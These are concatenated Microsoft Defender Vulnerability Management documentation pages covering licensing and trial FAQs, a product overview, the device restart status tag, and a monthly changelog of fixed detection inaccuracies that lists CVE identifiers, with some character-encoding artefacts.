-|[Vulnerability assessment](tvm-weaknesses.md)|Γ£ö|Γ£ö|
-|[Configuration assessment](tvm-microsoft-secure-score-devices.md)|Γ£ö|Γ£ö|
-|[Risk based prioritization](tvm-security-recommendation.md)|Γ£ö|Γ£ö|
-|[Remediation tracking](tvm-remediation.md)|Γ£ö|Γ£ö|
-|[Continuous monitoring](../defender-endpoint/configure-vulnerability-email-notifications.md)|Γ£ö|Γ£ö|
-|[Software inventory](tvm-software-inventory.md)|Γ£ö|Γ£ö|
-|[Software usages insights](tvm-usage-insights.md)|Γ£ö|Γ£ö|
-|[Security baselines assessment](tvm-security-baselines.md)|-|Γ£ö|
-|[Block vulnerable applications](tvm-block-vuln-apps.md)|-|Γ£ö|
-|[Browser extensions assessment](tvm-browser-extensions.md)|-|Γ£ö|
-|[Digital certificate assessment](tvm-certificate-inventory.md)|-|Γ£ö|
-|[Network share analysis](tvm-network-share-assessment.md)|-|Γ£ö|
-|[Hardware and firmware assessment](tvm-hardware-and-firmware.md)|-|Γ£ö|
-|[Authenticated scan for Windows](windows-authenticated-scan.md)|-|Γ£ö|
-
-## Next steps
--- [Get Microsoft Defender Vulnerability Management](get-defender-vulnerability-management.md)
security Defender Vulnerability Management Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-faq.md
- Title: Microsoft Defender Vulnerability Management frequently asked questions
-description: Find answers to frequently asked questions (FAQs) about MDVM
--- NOCSH------ m365-security-- Tier1- Previously updated : 06/02/2022--
-# Microsoft Defender Vulnerability Management frequently asked questions
-
-Find answers to frequently asked questions (FAQs) about Microsoft Defender Vulnerability Management. Use the following links to help find answer to your questions:
--- [Defender Vulnerability Management licensing FAQs](#defender-vulnerability-management-licensing-faqs)-- [Defender Vulnerability Management trial FAQs](#defender-vulnerability-management-licensing-faqs)-- [Block vulnerable applications FAQs](#block-vulnerable-applications-faqs)-- [Security baselines FAQs](#security-baselines-faqs)-- [Defender Vulnerability Management general FAQs](#defender-vulnerability-management-general-faqs)-
-## Defender Vulnerability Management licensing FAQs
-
-### What license does the user need to benefit from Defender Vulnerability Management capabilities?
-
-Microsoft Defender Vulnerability Management is available via two
-
-1. Microsoft Defender for Endpoint Plan 2 customers can seamlessly enhance their existing generally available vulnerability management capabilities with the Microsoft Defender Vulnerability Management add-on. This service provides consolidated inventories, expanded asset coverage, cross-platform support, and new assessment and mitigation tools. To sign up for the free 90-day trial, see [Defender Vulnerability Management Add-on](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-add-on-trial-for-defender-for-endpoint-plan-2-customers).
-
-2. For new customers or existing Defender for Endpoint P1 or Microsoft 365 E3 customers looking for a risk-based vulnerability management solution, Microsoft Defender Vulnerability Management Standalone helps you efficiently discover, assess, and remediate vulnerabilities and misconfigurations in one place. To sign up for the free 90-day trial, see [Defender Vulnerability Management Standalone](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-standalone).
-
-### Do I need to assign Defender Vulnerability Management licenses to users in my organization as instructed in the admin center?
-
-Currently, there's no need to assign the new Defender Vulnerability Management license to users. Licenses will be applied automatically after a customer signs up for the free trial.
-
-### Is Defender Vulnerability Management available as part of Defender for Endpoint Plan 2?
-
-If the customer has Defender for Endpoint Plan 2 they have the core vulnerability management capabilities. Defender Vulnerability Management is a separate solution from Defender for Endpoint (not included in Defender for Endpoint Plan 2) and is available as an add-on.
-
-## Defender Vulnerability Management trial FAQs
-
-### How do customers sign up for a trial?
-
-For existing Defender for Endpoint Plan 2 customers who want to evaluate the experience first-hand, we encourage directly onboarding onto the Microsoft Defender Vulnerability Management add-on free 90-day trial. For more information, see [Defender Vulnerability Management Add-on](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-add-on-trial-for-defender-for-endpoint-plan-2-customers).
-
-For new customers or existing Defender for Endpoint P1 or Microsoft 365 E3 customers, see [Defender Vulnerability Management Standalone](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-standalone) to sign up for the free 90-day trial.
-
-> [!NOTE]
-> Customers need to have the global admin role defined in Microsoft Entra ID to onboard the trial.
-
-### How is the service provisioned/deployed?
-
-Once a customer is onboarded on to the free-trial experience, Defender Vulnerability Management features are turned on by default at the tenant level for all users within the organization.
-
-### If a customer is in public preview, what will happen to their premium capabilities if I don't sign up for a free trial?
-
-The new capabilities will be available only to customers who onboard a trial. Customers who haven't onboarded will lose access to these capabilities. Blocked applications will be immediately unblocked. Security baseline profiles may be stored for a short additional time before being deleted.
-
-### How long does the trial last and what happens at the end of my trial?
--- The Defender Vulnerability Management add-on trial lasts for 90 days.-- The Defender Vulnerability Management Standalone trial lasts for 90 days.-
-After your trial ends, you'll have a 30 day grace period of active trial before the license becomes suspended. When the trial is suspended, you'll retain your security baselines, but you may lose access to your portal and your blocked applications may become unblocked.
-
-After 180 days, your license will be deactivated and your profiles will be deleted.
-
-## Block vulnerable applications FAQs
-
-### I want to block a vulnerable application but it's not showing up as available to block?
-
-Examples of recommendations where you might not see a mitigation action (such as block) includes:
--- Recommendations related to applications where Microsoft doesn't have sufficient information to block-- Recommendations related to Microsoft applications-- Recommendations related to operating systems-- Recommendations related to apps for macOS and Linux-
-It's also possible that your organization has reached the maximum indicator capacity of 15,000. If this is the case, you will need to free up space by deleting old indicators. To learn more, see [Manage indicators](../defender-endpoint/indicator-manage.md).
-
-### Does blocking vulnerable apps work on all devices?
-
-This feature is supported on Windows devices (1809 or later) with the latest Windows updates installed. Each device must have a minimum antimalware client version of 4.18.1901.x or later. The Engine version must be 1.1.16200.x or later.
-
-## Security baselines FAQs
-
-### What is the full list of baseline benchmarks I can use as part of security baselines assessment?
-
-There's currently support for:
--- Center for Internet Security (CIS) benchmarks for Windows 10, Windows 11, and Windows Server 2008R2 and above.-- Security Technical Implementation Guides (STIG) benchmarks for Windows 10 and Windows Server 2019.-
-Upcoming support:
--- Microsoft benchmarks for Windows 10, Windows 11, and Windows Server 2008R2 and above will be available in an upcoming release.-
-### What operating systems can I measure using security baseline assessments?
-
-Currently Windows is supported, but coverage will be expanded to cover more operating systems such as Mac and Linux.
-
-## Defender Vulnerability Management general FAQs
-
-### Where can I find the full list of capabilities across different plans?
-
-For details on the full list of capabilities across Microsoft Defender Vulnerability Management and Defender for Endpoint, see [Defender Vulnerability Management Capabilities](defender-vulnerability-management-capabilities.md).
-
-### Can customers buy only one capability?
-
-Microsoft Defender Vulnerability Management is available as a vulnerability management solution comprised of multiple premium capabilities.
-
-### Can I turn on Defender Vulnerability Management capabilities on a subset of devices in my organization?
-
-There isn't a way to selectively light up the Defender Vulnerability Management assessment capabilities (block vulnerable applications, browser extension, certificate inventory, and network share assessment) on a subset of devices in a given tenant.
security Defender Vulnerability Management Trial https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-trial.md
- Title: About the Microsoft Defender Vulnerability Management trial
-description: Learn about the Microsoft Defender Vulnerability Management trial
--- NOCSH------ m365-security-- Tier1- Previously updated : 04/02/2024--
-# About the Microsoft Defender Vulnerability Management trial
-
-Microsoft Defender Vulnerability Management provides advanced vulnerability management capabilities to minimize your organization's cyber risk. Get real-time asset discovery, continuous risk-based assessment and prioritization, and built in remediation tools.
-
-It includes capabilities so your teams can intelligently assess, prioritize, and seamlessly remediate the biggest risks to your organization.
-
-## How to sign up for the Defender Vulnerability Management trial
-
-> [!NOTE]
-> The sign up process outlined below is only relevant to customers who have access to the [Microsoft Defender 365 portal](https://security.microsoft.com/homepage).
->
-> If you don't have access to the Microsoft Defender 365 portal learn more about how you can sign up to the [Microsoft Defender Vulnerability Management Standalone trial](../defender-vulnerability-management/get-defender-vulnerability-management.md#try-defender-vulnerability-management-standalone).
->
-> If you're a Microsoft Defender for Cloud customers, see [Vulnerability Management capabilities for servers](./defender-vulnerability-management-capabilities.md#vulnerability-management-capabilities-for-servers) to learn more about the Defender Vulnerabilities Management capabilities available to your organization.
-
-To sign up for the Defender Vulnerability Management trial, you can go directly to the [Microsoft 365 trials hub](https://security.microsoft.com/trialHorizontalHub) page or by selecting **Trials** on the left navigation from the [Microsoft Defender 365 portal](https://security.microsoft.com/homepage).
-
-Once you've reached the [Microsoft 365 trials hub](https://security.microsoft.com/trialHorizontalHub):
--- If you have Defender for Endpoint Plan 2, find the **Defender Vulnerability Management add-on** card and select **Try now**.-- If you're a new customer or an existing Defender for Endpoint P1 or Microsoft 365 E3 customer, choose the **Defender Vulnerability Management** card and select **Try now**.-
-2. Review the information about what's included in the trial, then select **Begin trial**.
-
-Your trial will be effective immediately:
--- The Defender Vulnerability Management add-on trial lasts for 90 days.-- The Defender Vulnerability Management Standalone trial lasts for 90 days.-
-It can take up to 6 hours for all vulnerability management features to appear in your left navigation. Sign out and sign back in to see the updates.
-
-To make the most of your trial, see [Trial user guide: Microsoft Defender Vulnerability Management](./trial-user-guide-defender-vulnerability-management.md)
-
-## Required roles for starting the trial
-
-As a Global Administrator, you can start the trial or you can allow to users start the trial on behalf of your organization by enabling this option:
-
-1. In the Microsoft 365 admin center, go to **Settings** > **Org settings** > **Services** > **User owned apps and services**
-2. Check **Let users start trials on behalf of your organization**
-3. Select **Save**
--
-> [!NOTE]
-> If you don't want users in your organization to be able to start trials, as a Global Administrator you must disable this option once you've activated the trial.
->
-> Only a Global Administrator can end the trial.
-
-It can take a few hours for the changes to take effect. Once it does, return to the trial setup page and select **Begin trial**.
-
-## Licensing
-
-As part of the trial setup, the new Defender Vulnerability Management trial licenses will be applied to users automatically. Therefore, no assignment is needed (_The trial can automatically apply up to 1,000,000 licenses_). The licenses are active for the duration of the trial.
-
-## Getting started, extending, and ending the trial
-
-### Getting started
-
-You can start using Defender Vulnerability Management features as soon as you see them in the Microsoft Defender portal. Nothing is created automatically and users won't be affected. When you navigate to each solution, you may be guided to make extra setup configurations to start using features.
-
-### Extending the trial
-
-You can extend the trial within the last 15 days of the trial period. You're limited to a maximum of two trial periods. If you don't extend by the time your trial period ends, you'll need to wait at least 30 days before signing up for a second trial.
-
-### Ending the trial
-
-Admins can disable the trial anytime by selecting **Trials** on the left navigation, going to the **Defender Vulnerability Management** trial card and selecting **End trial**.
-
-Unless stated otherwise for the solution your trial data will be maintained for time, usually 180 days, before being permanently deleted. You may continue to access the data gathered during the trial until that time.
-
-## Terms and conditions
-
-See the [terms and conditions](/legal/microsoft-365/microsoft-365-trial) for Microsoft 365 trials.
-
-## Learn more about Defender Vulnerability Management
-
-Wondering what you can experience in your free trial? The Defender Vulnerability Management trial includes:
--- **[Security baselines assessment](tvm-security-baselines.md)**: When the trial ends security baseline profiles may be stored for a short additional time before being deleted.-- **[Blocking vulnerable applications](tvm-block-vuln-apps.md)**: When the trial ends blocked applications will be immediately unblocked whereas baseline profiles may be stored for a short additional time before being deleted.-- **[Browser extensions assessment](tvm-browser-extensions.md)**-- **[Digital certificates assessment](tvm-certificate-inventory.md)**-- **[Network shares analysis](tvm-network-share-assessment.md)**-- **[Hardware and firmware assessment](tvm-hardware-and-firmware.md)**-- **[Authenticated scan for Windows](windows-authenticated-scan.md)**
security Defender Vulnerability Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management.md
- Title: Microsoft Defender Vulnerability Management
-description: Microsoft Defender Vulnerability Management uses a risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.
-------- tier1-- m365-security-- essentials-overview Previously updated : 04/03/2024--
-# What is Microsoft Defender Vulnerability Management
-
-Reducing cyber risk requires comprehensive risk-based vulnerability management to identify, assess, remediate, and track all your biggest vulnerabilities across your most critical assets, all in a single solution.
-
-Defender Vulnerability Management delivers asset visibility, intelligent assessments, and built-in remediation tools for Windows, macOS, Linux, Android, iOS, and network devices. Using Microsoft threat intelligence, breach likelihood predictions, business contexts, and devices assessments, Defender Vulnerability Management rapidly and continuously prioritizes the biggest vulnerabilities on your most critical assets and provides security recommendations to mitigate risk.
-
-Watch the following video to learn more about Defender Vulnerability Management.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Y1FX]
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-For more information on the features and capabilities that are included in each offering, see [Compare Microsoft Defender Vulnerability Management offerings](defender-vulnerability-management-capabilities.md).
--
-With Defender Vulnerability Management, you can empower your security and IT teams to bridge workflow gaps and prioritize and address critical vulnerabilities and misconfigurations across your organization. Reduce cyber security risk with:
-
-## Continuous asset discovery and monitoring
-
-Defender Vulnerability Management built-in and agentless scanners continuously monitor and detect risk in your organization even when devices aren't connected to the corporate network.
-
-Consolidated inventories provide a real-time view of your organization's software applications, digital certificates, hardware and firmware, and browser extensions to help you monitor and assess all your organization's assets.
-
-Advanced vulnerability and configuration assessment tools help you understand and assess your cyber exposure, including:
--- **Security baselines assessment** - Create customizable baseline profiles to measure risk compliance against established benchmarks, such as, Center for Internet Security (CIS) and Security Technical Implementation Guides (STIG).-- **Visibility into software and vulnerabilities** - Get a view of the organization's software inventory, and software changes like installations, uninstalls, and patches.-- **Network share assessment** - Assess vulnerable internal network shares configuration with actionable security recommendations.-- **Authenticated scan for Windows** - Scan unmanaged Windows devices regularly for software vulnerabilities by providing Microsoft Defender Vulnerability Management with credentials to remotely access the devices.-- **Threat analytics & event timelines** - Use event timelines, and entity-level vulnerability assessments to understand and prioritize vulnerabilities.-- **Browser extensions assessment** - View a list of the browser extensions installed across different browsers in your organization. View information on an extension's permissions and associated risk levels.-- **Digital certificates assessment** - View a list of certificates installed across your organization in a single central certificate inventory page. Identify certificates before they expire and detect potential vulnerabilities due to weak signature algorithms.-- **Hardware and firmware assessment** - View a list of known hardware and firmware in your organization organized by system models, processors, and BIOS. Each view includes details such as the name of the vendor, number of weaknesses, threats insights, and the number of exposed devices.-
-## Risk-based intelligent prioritization
-
-Defender Vulnerability Management uses Microsoft's threat intelligence, breach likelihood predictions, business contexts, and device assessments to quickly prioritize the biggest vulnerabilities in your organization. A single view of prioritized recommendations from multiple security feeds, along with critical details including related CVEs and exposed devices, helps you quickly remediate the biggest vulnerabilities on your most critical assets. Risk-based intelligent prioritization:
--- **Focuses on emerging threats** - Dynamically aligns the prioritization of security recommendations with vulnerabilities currently being exploited in the wild and emerging threats that pose the highest risk.-- **Pinpoints active breaches** - Correlates vulnerability management and EDR insights to prioritize vulnerabilities being exploited in an active breach within the organization.-- **Protects high-value assets** - Identifies exposed devices with business-critical applications, confidential data, or high-value users.-
-## Remediation and tracking
-
-Enable security administrators and IT administrators to collaborate and seamlessly remediate issues with built-in workflows.
--- **Remediation requests sent to IT** - Create a remediation task in Microsoft Intune from a specific security recommendation.-- **Block vulnerable applications** - Mitigate risk with the ability to block vulnerable applications for specific device groups.-- **Alternate mitigations** - Gain insights on other mitigations, such as configuration changes that can reduce risk associated with software vulnerabilities.-- **Real-time remediation status** - Real-time monitoring of the status and progress of remediation activities across the organization.-
-## Navigation pane
-
-|Area|Description|
-|||
-|[**Dashboard**](tvm-dashboard-insights.md)|Get a high-level view of the organization exposure score, threat awareness, Microsoft Secure Score for Devices, expiring certificates, device exposure distribution, top security recommendations, top vulnerable software, top remediation activities, and top exposed device data.|
-|[**Recommendations**](tvm-security-recommendation.md)|See the list of security recommendations and related threat information. When you select an item from the list, a flyout panel opens with vulnerability details, a link to open the software page, and remediation and exception options. You can also open a ticket in Intune if your devices are joined through Microsoft Entra ID and you've enabled your Intune connections in Defender for Endpoint.|
-|[**Remediation**](tvm-remediation.md)|See remediation activities you've created and recommendation exceptions.|
-|[**Inventories**](tvm-software-inventory.md)|Discover and assess all your organization's assets in a single view.|
-|[**Weaknesses**](tvm-weaknesses.md)|See the list of common vulnerabilities and exposures (CVEs) in your organization.|
-|[**Event timeline**](threat-and-vuln-mgt-event-timeline.md)|View events that may impact your organization's risk.|
-|[**Baselines assessment**](tvm-security-baselines.md)|Monitor security baseline compliance and identify changes in real-time.|
-
-## APIs
-
-Run vulnerability management related API calls to automate vulnerability management workflows. To get started, see [Supported Microsoft Defender for Endpoint APIs](../defender-endpoint/exposed-apis-list.md).
-
-See the following articles for related Defender for Endpoint APIs:
--- [Machine APIs](../defender-endpoint/machine.md)-- [Recommendation APIs](../defender-endpoint/vulnerability.md)-- [Score APIs](../defender-endpoint/score.md)-- [Software APIs](../defender-endpoint/software.md)-- [Vulnerability APIs](../defender-endpoint/vulnerability.md)-- [List vulnerabilities by machine and software](../defender-endpoint/get-all-vulnerabilities-by-machines.md)-
-## Next steps
--- [Compare security features in Microsoft Defender Vulnerability Management](defender-vulnerability-management-capabilities.md)-- [Find out how to get Microsoft Defender Vulnerability Management](get-defender-vulnerability-management.md)-
-## See also
--- [Defender Vulnerability management blog](https://go.microsoft.com/fwlink/?linkid=2195501)-- [Supported operating systems and platforms](tvm-supported-os.md)-- [Vulnerability management dashboard](tvm-dashboard-insights.md)
security Device Restart Status https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/device-restart-status.md
- Title: Device restart status
-description: Learn about the device restart status tag in Microsoft Defender Vulnerability Management
-
-ms.pagetype: security
----
- - m365-security
- - tier1
- Previously updated : 03/04/2022--
-# Device restart status
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-Security recommendations in Defender Vulnerability Management can help reduce your overall vulnerability exposure and your exposure score. A robust update process is key when it comes to addressing these recommendations in your organization. If an update hasn't completed for some devices due to a pending restart, the effect of addressing the security recommendation isn't reflected in your exposure score.
-
-The **Pending restart** tag helps you identify devices in this state so you can take action, and it gives you visibility into why some update actions taken aren't being reflected in your exposure score.
-
-> [!NOTE]
-> The tag is currently available for Windows(OS) updates and KB corrections.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## View the device restart status
-
-The device restart status is visible in the following experiences in the Microsoft Defender portal.
-
-### Security recommendations page
-
-On the security recommendations pages, filter by the **Pending restart** tag to only see security recommendations with devices pending a restart.
--
-### Software page
-
-On the software page filter by, the **Pending restart** tag to see missing KBs with devices that are pending a restart:
---
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Vulnerabilities in my organization](tvm-weaknesses.md)
security Fixed Reported Inaccuracies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/fixed-reported-inaccuracies.md
- Title: Vulnerability support in Microsoft Defender Vulnerability Management
-description: List the reported inaccuracies that were fixed
-
-ms.pagetype: security
----
- - m365-security
- - tier2
- Previously updated : 06/27/2023--
-# Vulnerability support in Microsoft Defender Vulnerability Management
-
-Having accurate and up-to-date information about security vulnerabilities that could threaten your organization, and information on steps to help prevent them, is essential for keeping your organization secure.
--- The [Weaknesses](https://security.microsoft.com/vulnerabilities/cves) page in Defender Vulnerability Management lists the software vulnerabilities your devices are exposed to.-- The [Recommendations](https://security.microsoft.com/security-recommendations) page provides prioritized recommendations to help shorten the time to mitigate or remediate vulnerabilities.-
-If you come across missing or incorrect vulnerability information for your organization, you can use the report inaccuracy capability available for both weaknesses and recommendations to report false positives, inaccuracies, or incomplete information.
-
-This article provides information on inaccuracies that have been reported. You can use it to determine if new or updated vulnerability support has been added, or if support isn't currently available.
-
-> [!NOTE]
-> The tables may also include updates based on vulnerability support queries from ICMs or in response to customer requests.
-
-The following tables present the relevant vulnerability information organized by month:
-
-## March 2024
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| - | Defender Vulnerability Management doesn't currently support CVE-2023-4966 | 05-Mar-24 |
-| 47296 | Defender Vulnerability Management doesn't currently support Bitdefender Vulnerabilities - CVE-2017-17408, CVE-2017-17409 & CVE-2017-17410 | 05-Mar-24 |
-| 45748 | Fixed inaccuracy in Zscaler Client Connector | 14-Mar-24 |
-| 49672 | Fixed inaccuracy in CVE-2024-0819 | 20-Mar-24 |
-| 30583 | Fixed inaccuracy in Opera Browser | 21-Mar-24 |
-| - | Fixed inaccuracy in Autodesk Civil 3D and Anydesk | 21-Mar-24 |
-| 44979 | Defender Vulnerability Management doesn't currently support CVE-2017-13774 | 26-Mar-24 |
-| 46812 | Fixed inaccuracy in Dell Supportassist | 26-Mar-24 |
-| 48178 | Fixed inaccuracy in RuneLite | 26-Mar-24 |
-| 49660 | Fixed inaccuracy in RSUPPORT RemoteView Agent | 26-Mar-24 |
-| 46828 | Defender Vulnerability Management doesn't currently support OsiSoft Pi Server | 26-Mar-24 |
-| 48034 | Defender Vulnerability Management doesn't currently support CVE-2023-35637 | 26-Mar-24 |
-| - | Fixed inaccuracy in Adobe Acrobat Reader and Reader DC | 26-Mar-24 |
-| 46021 | Defender Vulnerability Management doesn't currently support CVE-2023-6129 | 26-Mar-24 |
-| - | Fixed inaccuracy in Ultraedit | 26-Mar-24 |
-| - | Defender Vulnerability Management doesn't currently support CVE-2023-47248 | 26-Mar-24 |
-| - | Fixed inaccuracy in Mitel 6920 & 6930 Firmwares | 31-Mar-24 |
-
-## February 2024
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| - | Fixed inaccuracy in Snow Inventory Agent | 06-Feb-24 |
-| 42360 | Fixed inaccuracy in GitHub vulnerabilities - CVE-2020-10519 and CVE-2021-22863 | 12-Feb-24 |
-| 44875 | Fixed inaccuracy in Zoom Meetings for macOS | 14-Feb-24 |
-| 45686 | Fixed inaccuracy in ConnectWise Control (Formerly known as ScreenConnect) | 14-Feb-24 |
-| 45559 | Added Microsoft Defender Vulnerability Management support to Forta GoAnyWhere MFT | 14-Feb-24 |
-| - | Added Microsoft Defender Vulnerability Management support to BeyondTrust Remote Support Jump Client | 14-Feb-24 |
-| - | Fixed inaccuracy in Ignite Real Time | 14-Feb-24 |
-| - | Added Microsoft Defender Vulnerability Management support to Ivanti (Pulse Secure) February released Vulnerabilities | 20-Feb-24 |
-| - | Defender Vulnerability Management doesn't currently support SAP GUI | 21-Feb-24 |
-| 46606 | Defender Vulnerability Management doesn't currently support Postgresql | 21-Feb-24 |
-| 47700 | Defender Vulnerability Management doesn't currently support Adobe Digital Editions | 21-Feb-24 |
-| 45297 | Fixed inaccuracy in Tera Term vulnerability - CVE-2023-48995 | 22-Feb-24 |
-| - | Fixed invalid version detections in Control & Control Client | 23-Feb-24 |
-| - | Added Microsoft Defender Vulnerability Management support to ConnectWise Control vulnerabilities - CVE-2024-1708 & CVE-2024-1709 | 23-Feb-24 |
-| 43472 | Added correct version details in all FortiClient CVEs | 25-Feb-24 |
-| 45727 | Added Microsoft Defender Vulnerability Management support to Box Tools & Box for Office products | 26-Feb-24 |
-| 47045 | Fixed inaccuracy issues in April 2021 GitLab Vulnerabilities | 26-Feb-24 |
-| 47174 | Added accurate EOS details for SQL Server Editions | 26-Feb-24 |
-| 46416 | Fixed inaccuracy in Oracle Kernel-uek-modules | 28-Feb-24 |
-
-## January 2024
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| 30873 | Fixed inaccuracy in Apache Tomcat | 08-Jan-24 |
-| 31664 | Fixed inaccuracy in OpenSSL | 08-Jan-24 |
-| 30674 | Fixed inaccuracy in Microsoft Visio | 08-Jan-24 |
-| 30674 | Fixed inaccuracy in Microsoft Office | 08-Jan-24 |
-| 35382 | Fixed inaccuracy in MySQL connector | 08-Jan-24 |
-| 38235 | Fixed inaccuracy in Python | 10-Jan-24 |
-| - | Defender Vulnerability Management doesn't currently support Atlassian Confluence | 10-Jan-24 |
-| - | Fixed inaccuracy in JetBrains TeamCity and JetBrains IntelliJ IDEA | 10-Jan-24 |
-| 41860 | Defender Vulnerability Management doesn't currently support Lenovo ThinkPad T480 Firmware | 10-Jan-24 |
-| 41049 | Defender Vulnerability Management doesn't currently support Lenovo ThinkCentre M700 Firmware | 10-Jan-24 |
-| 25969 | Defender Vulnerability Management doesn't currently support Siemens Sinec NMS | 10-Jan-24 |
-| 39167 | Defender Vulnerability Management doesn't currently support Avaya IP Office | 10-Jan-24 |
-| - | Fixed inaccuracy in Palo Alto Networks - Global Protect | 10-Jan-24 |
-| 38038 | Fixed inaccuracy in CVE-2022-3167 | 16-Jan-24 |
-| 40269 | Fixed inaccuracy in CVE-2023-46587 | 16-Jan-24 |
-| 36968 | Fixed inaccuracies in Lenovo August 2021 released Vulnerabilities | 16-Jan-24 |
-| 41041 | Fixed inaccurate CVEs of Samsung Health | 16-Jan-24 |
-| 38717 | Defender Vulnerability Management doesn't currently support CVE-2023-36397 | 17-Jan-24 |
-| 43673 | Defender Vulnerability Management doesn't currently support Lenovo ThinkPad T14 Gen 2 Firmware | 17-Jan-24 |
-| 43513 | Fixed inaccuracies in OpenSSL invalid file detections | 17-Jan-24 |
-| 41204 | Fixed inaccuracy in Affinity photo | 21-Jan-24 |
-| 40584 | Fixed inaccuracy in Veeam One Client | 21-Jan-24 |
-| 40704 | Fixed inaccuracy in Windows Subsystem for Linux(WSL) | 21-Jan-24 |
-| 43600 | Fixed inaccuracy in Dell RVTools | 21-Jan-24 |
-| 43378 | Fixed inaccuracy in Decisive Tactics Serial | 21-Jan-24 |
-| 43466 | Fixed inaccuracy in Intel- Dynamic Tuning Technology (DTT) | 21-Jan-24 |
-| 35750 | Fixed inaccuracy in Bitdefender Internet Security | 21-Jan-24 |
-| 44190 | Fixed inaccuracy in CVE-2023-48670 | 29-Jan-24 |
-| 43565 | Fixed inaccuracy in WinSCP Vulnerability - CVE-2023-48795 | 30-Jan-24 |
-| - | Fixed detection issues in Ignite Realtime Openfire | 30-Jan-24 |
-| - | Fixed inaccuracy in GitLab | 30-Jan-24 |
-| - | Added Microsoft Defender Vulnerability Management support to SAP Business Client | 30-Jan-24 |
-| - | Added Microsoft Defender Vulnerability Management support to SAP GUI | 30-Jan-24 |
-| - | Added Microsoft Defender Vulnerability Management support to PostgreSQL | 30-Jan-24 |
-| - | Added Microsoft Defender Vulnerability Management support to Adobe Digital Editions | 30-Jan-24 |
-| - | Fixed inaccuracy in Python Anaconda3 | 30-Jan-24 |
-
-## December 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| - | Added Microsoft Defender Vulnerability Management support to SysAid Server | 05-Dec-23 |
-| - | Removed CVE 'TVM-0001-00000000' from Defender Vulnerability Management | 05-Dec-23 |
-| 33439 | Fixed inaccuracies in IBM Maximo CVEs | 05-Dec-23 |
-| 38186 | Fixed inaccuracy in CVE-2020-36160 | 05-Dec-23 |
-| 38705 | Fixed inaccuracies in November released Veeam ONE CVEs | 05-Dec-23 |
-| - | Added End of Support details for Intel HAXM | 05-Dec-23 |
-| 36856 | Defender Vulnerability Management doesn't currently support Click Studios-Passwordstate | 05-Dec-23 |
-| 33377 | Defender Vulnerability Management doesn't currently support IBM Db2 | 05-Dec-23 |
-| 35256 | Fixed inaccuracy in Techsmith Snagit | 10-Dec-23 |
-| 39620 | Fixed inaccuracy in Adobe Audition | 10-Dec-23 |
-| 39542 | Fixed inaccuracy in Splunk Vulnerabilities- CVE-2021-22570, CVE-2022-31799, CVE-2023-24329, CVE-2023-3817, CVE-2023-3446 | 19-Dec-23 |
-| 39620 | Fixed inaccuracy in CVE-2023-28388 | 19-Dec-23 |
-| 35256 | Fixed inaccuracy in CVE-2020-11541 | 19-Dec-23 |
-| 41330 | Fixed inaccuracy in CVE-2023-22524 | 19-Dec-23 |
-| - | Fixed inaccuracy in Progress OpenEdge | 20-Dec-23 |
-| 27605 | Fixed inaccuracy in Maltego | 20-Dec-23 |
-
-## November 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| 35498 | Fixed inaccuracy in CVE-2023-38802 | 05-Nov-23 |
-| 34698 | Fixed normalization inaccuracy in Condor Team | 05-Nov-23 |
-| 36594 | Fixed inaccurate file path detections in Cisco Secure Client | 12-Nov-23 |
-| 37041 | Fixed inaccuracy in OpenVPN | 12-Nov-23 |
-| 36808 | Fixed inaccurate file path detections in Zoom Meetings | 15-Nov-23 |
-| 33837 | Defender Vulnerability Management doesn't currently support IBM Cognos Analytics | 15-Nov-23 |
-| 37041 | Fixed inaccuracy in CVE-2021-3606 | 15-Nov-23 |
-| 37408 | Fixed inaccuracy in Kernel Module Core | 15-Nov-23 |
-| 37440 | Added accurate End of Life details for Oracle JDK versions | 26-Nov-23 |
-| - | Fixed inaccuracy in CVE-2023-47246 | 26-Nov-23 |
-| 36774 | Fixed inaccuracies in October released Node.js CVEs | 26-Nov-23 |
-| 29643 | Fixed inaccurate detections in Palo Alto Networks - Global Protect | 29-Nov-23 |
-| 36459 | Defender Vulnerability Management doesn't currently support Siemens Simatic WinCC Runtime | 29-Nov-23 |
-| 36348 | Fixed inaccurate file path detections in PHP | 29-Nov-23 |
-
-## October 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| 32689 | Fixed inaccuracy in Kernel Module Extra | 11-Oct-23 |
-| - | Fixed inaccuracies in Exim vulnerabilities | 11-Oct-23 |
-| 33312 | Updated End of Support details for acrobat and acrobat reader version 2017 | 11-Oct-23 |
-| - | Fixed inaccuracy in CVE-2023-38545 | 12-Oct-23 |
-| 32734 | Fixed inaccuracy in Thunderbird | 19-Oct-23 |
